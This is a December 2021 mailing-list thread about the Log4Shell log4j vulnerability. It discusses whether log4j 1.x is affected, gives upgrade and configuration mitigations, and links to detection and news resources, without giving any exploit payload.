[aklug] [nuga] log4j trivial RCE (similar to ShellShock) - "Log4Shell" CVE-2021-44228

Sun Dec 12 19:33:19 AKST 2021

Hi, Mike -

Good question. log4j 1.x is not vulnerable to the "Log4Shell" vulnerability
itself, per its author. However, it is vulnerable to a number of other
issues, and is no longer supported by the authors. So for any product with
1.x still integrated, that parent products' vendors should be asked
questions about upgrade plans.

-- 
Royce

On Sun, Dec 12, 2021 at 7:25 PM Mike <tibor at tibor.org> wrote:

> Royce,
>
> From what I've been seeing, only version 2.x seems to be vulnerable, and
> 1.x is not, however nothing seems to be certain about that.
>
> Have you seen any hard confirmation yet whether 1.x is vulnerable?
>
> Thanks,
> Mike
>
>
> On Fri, 10 Dec 2021, Royce Williams wrote:
>
> > This one is developing quickly, so I'll push updates here as I discover
> them:
> >
> https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
> >
> > --
> > Royce Williams
> > Tech Solvency
> >
> >
> > On Fri, Dec 10, 2021 at 7:21 AM Royce Williams <royce at techsolvency.com>
> wrote:
> >       Summary (Dan Goodin):
> > Log4j takes a log message, interprets it as a URL and goes out and
> fetches it. It will even execute JavaScript in URLs
> > with full privileges of the main program. Exploits are triggered inside
>  log messages using the ${} syntax. Easy peasy.
> >
> > Who is affected:
> > - Servers and clients that run Java and also log anything using the
> log4j framework
> > - log4j 2.x confirmed, and probably log4j 1.x also
> > - Don't forget appliances that use Java server components
> > - Downstream projects that include log4j, including Apache Struts, Solr,
> etc.
> >
> > Required to fully mitigate:
> > - Upgrade Log4j 2.15.0
> > - requires Java 8
> >
> > Exploitation: active:
> > https://twitter.com/GreyNoiseIO/status/1469326260803416073
> >
> > Mitigations - easiest:
> > - (@MalwareTechBlog): If you can't upgrade log4j, you can mitigate the
> RCE vulnerability by setting
> > log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in
> JVM command line).
> >
> > Mitigations - official project itself (
> https://logging.apache.org/log4j/2.x/)
> > >Users of Log4j 2.10 or greater may add -Dlog4j.formatMsgNoLookups=true
> as a command line option or add
> > log4j.formatMsgNoLookups=true to a log4j2.component.properties file on
> the classpath to prevent lookups in log event
> > messages.
> > >Users since Log4j 2.7 may specify %m{nolookups} in the PatternLayout
> configuration to prevent lookups in log event
> > messages.
> > >Remove the JndiLookup and JndiManager classes from the log4j-core jar.
> Removal of the JndiManager will cause the
> > JndiContextSelector and JMSAppender to no longer function.
> >
> > Mitigations - harder:
> > - WAF to limit exploit queries
> > - egress filtering to block unexpected outbound traffic
> >
> > Exploit detection:
> > https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
> >
> > Good threads and summaries:
> > - https://twitter.com/GossiTheDog/status/1469248250670727169
> > -
> https://cert.at/de/warnungen/2021/12/kritische-0-day-sicherheitslucke-in-apache-log4j-bibliothek
> (German)
> > - https://github.com/YfryTchsGD/Log4jAttackSurface
> >
> > --
> > Royce Williams
> > Tech Solvency
> >
> >
> >
> >
>
>
> -=-=-=-=-=-=-=-=-=-=-=-
> Groups.io Links: You receive all messages sent to this group.
> View/Reply Online (#514): https://groups.io/g/nuga/message/514
> Mute This Topic: https://groups.io/mt/87639411/548220
> Group Owner: nuga+owner at groups.io
> Unsubscribe: https://groups.io/g/nuga/leave/1150102/548220/107963826/xyzzy
> [royce.williams at gmail.com]
> -=-=-=-=-=-=-=-=-=-=-=-
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.aklug.org/pipermail/aklug/attachments/20211212/1a879c42/attachment.htm>